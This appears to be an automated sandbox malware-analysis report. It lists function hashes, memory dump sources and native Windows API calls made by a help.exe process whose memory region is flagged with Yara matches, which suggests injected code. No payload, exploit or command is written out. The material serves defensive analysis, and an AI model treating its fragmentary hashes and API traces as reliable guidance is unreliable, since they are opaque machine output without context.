                                                                                        • Instruction Fuzzy Hash: 5B9002B124101502D641715944146460509A7D1381FA1C422A0424554E86958A96FAE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C099D0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8da61eba55428c40323679ce89c1fcc7e6bfb69b8c9d61f86ceab143cd9bd494
                                                                                        • Instruction ID: 4c4cd1b9ca080f81fbd1edfac294abd89b5e3ba275bf8f2671baa30b0a4adcee
                                                                                        • Opcode Fuzzy Hash: 8da61eba55428c40323679ce89c1fcc7e6bfb69b8c9d61f86ceab143cd9bd494
                                                                                        • Instruction Fuzzy Hash: C19002E121101142D60461594414746054597E2341F61C422A2154554CC5698CA1B1A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09950, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fe96f6c8c53d51ddd77b33537af81aec5285ffcd4d86ef26f6f81dd7442dda5
                                                                                        • Instruction ID: 9e8b55823478f527592ba18cadb9efddb90fc2bc53c2af839fbc4deeabc71412
                                                                                        • Opcode Fuzzy Hash: 3fe96f6c8c53d51ddd77b33537af81aec5285ffcd4d86ef26f6f81dd7442dda5
                                                                                        • Instruction Fuzzy Hash: BD9002E120141503D64065594814647050597D1342F61C421A2064555E8A698C91B1B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09A80, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e7137a4ccb512ceb80f4c5191b9cee768ea92d3a86531459115067bd447caee
                                                                                        • Instruction ID: 1371668f22764a2229dec010e49212e5696d3289a2e1f2df3d6caa78bdca63a4
                                                                                        • Opcode Fuzzy Hash: 7e7137a4ccb512ceb80f4c5191b9cee768ea92d3a86531459115067bd447caee
                                                                                        • Instruction Fuzzy Hash: 129002A120145542D64062594814B4F460597E2342FA1C429A4156554CC9558895B7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09A10, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e0049f206991ad77bc6fae508575be6dab17f4c2014724ea65b381aa47685d6
                                                                                        • Instruction ID: 93ce684cb3b1432a8080a2d7a3c904a2d545ad4833a5cf6b4982907be795b068
                                                                                        • Opcode Fuzzy Hash: 9e0049f206991ad77bc6fae508575be6dab17f4c2014724ea65b381aa47685d6
                                                                                        • Instruction Fuzzy Hash: B89002B120141502D60061594818787050597D1342F61C421A5164555E86A5C8D1B5B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 941fea26394408b0e5ebe0e89063d94e87c8c01608c8a4256aac059989f9f1a5
                                                                                        • Instruction ID: 4acdff5b63afe72fd3c7d07b3233223657d5fb9dc71cdd502079332f62f56d5e
                                                                                        • Opcode Fuzzy Hash: 941fea26394408b0e5ebe0e89063d94e87c8c01608c8a4256aac059989f9f1a5
                                                                                        • Instruction Fuzzy Hash: 5B9002B120145102D6407159845464B5505A7E1341F61C821E0425554C86558896F2A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09B00, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1cfbb626c8b08d2fc14975da837e7afc0e6cc8928d923adcc4e037e8eb71b8a1
                                                                                        • Instruction ID: d9cb9d0c12163cb2c644128c850f1fb8ab584c20f6a6516af461d9ebd44e20c2
                                                                                        • Opcode Fuzzy Hash: 1cfbb626c8b08d2fc14975da837e7afc0e6cc8928d923adcc4e037e8eb71b8a1
                                                                                        • Instruction Fuzzy Hash: 879002A124101902D640715984247470506D7D1741F61C421A0024554D865689A5B6F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C095F0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe860907370ae68019deab2e18ba81f1487c24b8520ac71125f5d3195e763a38
                                                                                        • Instruction ID: 1b2e3d1cd28afc4c45427c71cdef5dd3bf227677556c38506ee360648255d1e0
                                                                                        • Opcode Fuzzy Hash: fe860907370ae68019deab2e18ba81f1487c24b8520ac71125f5d3195e763a38
                                                                                        • Instruction Fuzzy Hash: 929002B120101902D604615948146C6050597D1341F61C421A6024655E96A588D1B1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09560, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16e6b27b996675fb4a044f3caafc3f4216dacfc098481685541edce783a5f441
                                                                                        • Instruction ID: 23f123a2973502a678f05e277703320ad4b343949f1f35e4b3e2ffd974edf7ac
                                                                                        • Opcode Fuzzy Hash: 16e6b27b996675fb4a044f3caafc3f4216dacfc098481685541edce783a5f441
                                                                                        • Instruction Fuzzy Hash: C39002A5221011020645A559061454B0945A7D73913A1C425F1416590CC66188A5B3A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09520, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 87ba3292e543dece266687994059cd97ec84ade49450196de32f0aec69e429f5
                                                                                        • Instruction ID: e4da991fd803be51074732669faccf7577276e7cb3835c55182f62532fe9394a
                                                                                        • Opcode Fuzzy Hash: 87ba3292e543dece266687994059cd97ec84ade49450196de32f0aec69e429f5
                                                                                        • Instruction Fuzzy Hash: 109002E1201151924A00A2598414B4A4A0597E1341B61C426E1054560CC5658891F1B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0AD30, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c18332388e3d9735f2280d5027d0d4456ce58b282214bbdb11e7b9dbd9019c35
                                                                                        • Instruction ID: 0d6e3d46881c7b7472a7075a08f1d93cdcf350007b812842bb66c02d71461700
                                                                                        • Opcode Fuzzy Hash: c18332388e3d9735f2280d5027d0d4456ce58b282214bbdb11e7b9dbd9019c35
                                                                                        • Instruction Fuzzy Hash: B49002B1A05011129640715948246864506A7E1781B65C421A0514554C89948A95B3E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C096D0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bbee364c6dc6c55f015c58451abdc353153021ff19fa4c271d458c7de43e020
                                                                                        • Instruction ID: b50354db92b349b1e38196c16adc31fa2ec1c2a24b45056ab2b5e41ce275e067
                                                                                        • Opcode Fuzzy Hash: 7bbee364c6dc6c55f015c58451abdc353153021ff19fa4c271d458c7de43e020
                                                                                        • Instruction Fuzzy Hash: DC9002B120101942D60061594414B86050597E1341F61C426A0124654D8655C891B5A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09650, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f6b9774f6950e6d8ca84554c87ba44eec0b76e39af664d081b6448537f14907
                                                                                        • Instruction ID: a150ce11615ea5eeb439a5739d12f33e495196989065334cbb1b3cf46478a6b7
                                                                                        • Opcode Fuzzy Hash: 8f6b9774f6950e6d8ca84554c87ba44eec0b76e39af664d081b6448537f14907
                                                                                        • Instruction Fuzzy Hash: 479002B120505942D64071594414A86051597D1345F61C421A0064694D96658D95F6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09610, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc27a530e0cfca75000cb8f3a35df13428970e435051c308cfcf2daf0e5d04bd
                                                                                        • Instruction ID: b55768af026ffc6bc7c39e0d8aff0df6597b1685cc0f753bea48a9c97b88dc0c
                                                                                        • Opcode Fuzzy Hash: dc27a530e0cfca75000cb8f3a35df13428970e435051c308cfcf2daf0e5d04bd
                                                                                        • Instruction Fuzzy Hash: BB9002B160501902D65071594424786050597D1341F61C421A0024654D87958A95B6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09FE0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef818fdbd780f8da95ab8dc26da08f12b02699159ccf4796aa2eef2474a91f70
                                                                                        • Instruction ID: b54654dc74373c4da574e78806967e556e20c011ed372d0715bed222b0fc1ca4
                                                                                        • Opcode Fuzzy Hash: ef818fdbd780f8da95ab8dc26da08f12b02699159ccf4796aa2eef2474a91f70
                                                                                        • Instruction Fuzzy Hash: C49002B131115502D61061598414746050597D2341F61C821A0824558D86D588D1B1A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09760, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4fee8642dcfadc41e2e99dee20ee5c9028aabbca6a78acc63443f7120469c6b5
                                                                                        • Instruction ID: 6ad1e47321fbb888ba316a23a8bc86910e4af54e916e2370189508c6c6ad85f7
                                                                                        • Opcode Fuzzy Hash: 4fee8642dcfadc41e2e99dee20ee5c9028aabbca6a78acc63443f7120469c6b5
                                                                                        • Instruction Fuzzy Hash: 339002B120101503D60061595518747050597D1341F61D821A0424558DD6968891B1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09770, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e6763479a198b3f97fed35f76a1dcdcb5d08696527cf522aac9be9d68a3856f
                                                                                        • Instruction ID: af9691f6202f48c9a36c4108d9b1aaf7dd523f5a3374513df56d913e3ff03d0d
                                                                                        • Opcode Fuzzy Hash: 9e6763479a198b3f97fed35f76a1dcdcb5d08696527cf522aac9be9d68a3856f
                                                                                        • Instruction Fuzzy Hash: 2A9002A120505542D60065595418A46050597D1345F61D421A1064595DC6758891F1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0A770, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df790b542ce35c71ae1b588100f2799e1cd499c7522b07509d6db0641c05a106
                                                                                        • Instruction ID: d31d25fca16398c6a7e21d130fd2d4771d10ff57d7b69401b15c67f53d03cb5e
                                                                                        • Opcode Fuzzy Hash: df790b542ce35c71ae1b588100f2799e1cd499c7522b07509d6db0641c05a106
                                                                                        • Instruction Fuzzy Hash: EF9002B520505542DA0065595814AC7050597D1345F61D821A042459CD869488A1F1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0A710, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c25379312f4de78db968b29528f501af9b33709478b69007f5978243b2aad947
                                                                                        • Instruction ID: e12b169847bc296840069932bc2f262c8fd97cd2412bcafa0ce83d8720b92986
                                                                                        • Opcode Fuzzy Hash: c25379312f4de78db968b29528f501af9b33709478b69007f5978243b2aad947
                                                                                        • Instruction Fuzzy Hash: 809002B1301011529A00A6995814A8A460597F1341B61D425A4014554C859488A1B1A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09730, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26ba893519da6ee07193e8d79451b0be32a4b9e749e11b227606f77fdd1bc853
                                                                                        • Instruction ID: 4b082ebe5bfc884a6b961c013fe56ca71554d4e7cf735d844b303264e14b763d
                                                                                        • Opcode Fuzzy Hash: 26ba893519da6ee07193e8d79451b0be32a4b9e749e11b227606f77fdd1bc853
                                                                                        • Instruction Fuzzy Hash: 749002A160501502D64071595428746051597D1341F61D421A0024554DC6998A95B6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09670, Relevance: .0, Instructions: 2COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: 8d60ba188eef049f5c607e4c35e32b37320caf5aa3e0722a5f9c187da9c32960
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E00C5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00C0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00C55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00C55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x00c5fdda
                                                                                        0x00c5fde2
                                                                                        0x00c5fde5
                                                                                        0x00c5fdec
                                                                                        0x00c5fdfa
                                                                                        0x00c5fdff
                                                                                        0x00c5fe0a
                                                                                        0x00c5fe0f
                                                                                        0x00c5fe17
                                                                                        0x00c5fe1e
                                                                                        0x00c5fe19
                                                                                        0x00c5fe19
                                                                                        0x00c5fe19
                                                                                        0x00c5fe20
                                                                                        0x00c5fe21
                                                                                        0x00c5fe22
                                                                                        0x00c5fe25
                                                                                        0x00c5fe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C5FDFA
                                                                                        Strings
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C5FE01
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C5FE2B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 1ce3b8362fa66c10cf018f5d9c891866e487941d2f8a14c6b305525d3de6c958
                                                                                        • Instruction ID: 6aefb186d69fbcfce029d4b4317a2e25613479b5aed79708e3c2e8bfdc8b7d06
                                                                                        • Opcode Fuzzy Hash: 1ce3b8362fa66c10cf018f5d9c891866e487941d2f8a14c6b305525d3de6c958
                                                                                        • Instruction Fuzzy Hash: C9F0F636200601BFD6241B45DC03F73BF5AEB44771F240314FA28561E1DAA2F8A096F4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: help.exe PID: 5524 Parent PID: 3388 help.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 03219F2D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219F7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 71574804cf3004585cb6c909f93dc19b96f968ceef961478ef20c269a24f7ae4
                                                                                        • Instruction ID: 05fb187cf974d27a3ce19a2b6557245290098c98582fc831a81743d69d690156
                                                                                        • Opcode Fuzzy Hash: 71574804cf3004585cb6c909f93dc19b96f968ceef961478ef20c269a24f7ae4
                                                                                        • Instruction Fuzzy Hash: 62F0CFB2215108AFCB08CF88DC94EEB37EAAF8C354F158248FA0DD7250C630E851CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03219F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219F7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: d4edf0e84ea30d6c893b3300bb3c3344692d813b6836014f6b3e6b5b307b7f12
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: 40F0BDB2211208ABCB08CF88DC94EEB77EDAF8C754F158248BA0D97240C630E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03219FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(03214D42,5EB6522D,FFFFFFFF,03214A01,?,?,03214D42,?,03214A01,FFFFFFFF,5EB6522D,03214D42,?,00000000), ref: 0321A025
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: acd3adacb9c30494fa291eff555a4feafe4effb093da48bda71bb36de1443ad8
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: C7F0A4B6210208ABCB14DF89DC90EEB77ADAF8C754F158248BA1D97241D630E9518BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A10A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 0321A149
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 2b73025b0f74bd9e98965947feabbbab50b323508463cc75f3b9186fee60a82a
                                                                                        • Instruction ID: f8e9e0850cda4f1cce1e056d50b9cca47e451a90389dfa934052932508218abc
                                                                                        • Opcode Fuzzy Hash: 2b73025b0f74bd9e98965947feabbbab50b323508463cc75f3b9186fee60a82a
                                                                                        • Instruction Fuzzy Hash: BAF058B2210208ABCB14DF99DC91EEB77A9EF88260F108649FA4C97241C631E851CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 0321A149
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                        • Instruction ID: 964330f352dae0f65a6c4075acf1096462ec41e2257233ce91025ad9ead40314
                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                        • Instruction Fuzzy Hash: 40F015B6210208ABCB14DF89CC80EAB77ADAF88650F118248BE0897241C630F911CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 0321A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: 8b3e0dfafb9661408872a8e01e5c006cfc2a800b708c82482d21b81f27b4f609
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: BCD01776210314ABD710EB98CC85FA77BADEF48660F154599BA189B242C570FA1086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A05A, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 0321A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 23bdf99acf056ecf46893c4d64db3d293650bf3222a72e0ad6f8434401bb97c4
                                                                                        • Instruction ID: cf3aa5b54833d43ea9182c506c0b37427c7e8312dc672000aeee78342158b0c9
                                                                                        • Opcode Fuzzy Hash: 23bdf99acf056ecf46893c4d64db3d293650bf3222a72e0ad6f8434401bb97c4
                                                                                        • Instruction Fuzzy Hash: 73E02BA941D2C04FC753FBB4A4E00C7BF50DEA11283284ACED8E80B603C676D21AD790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
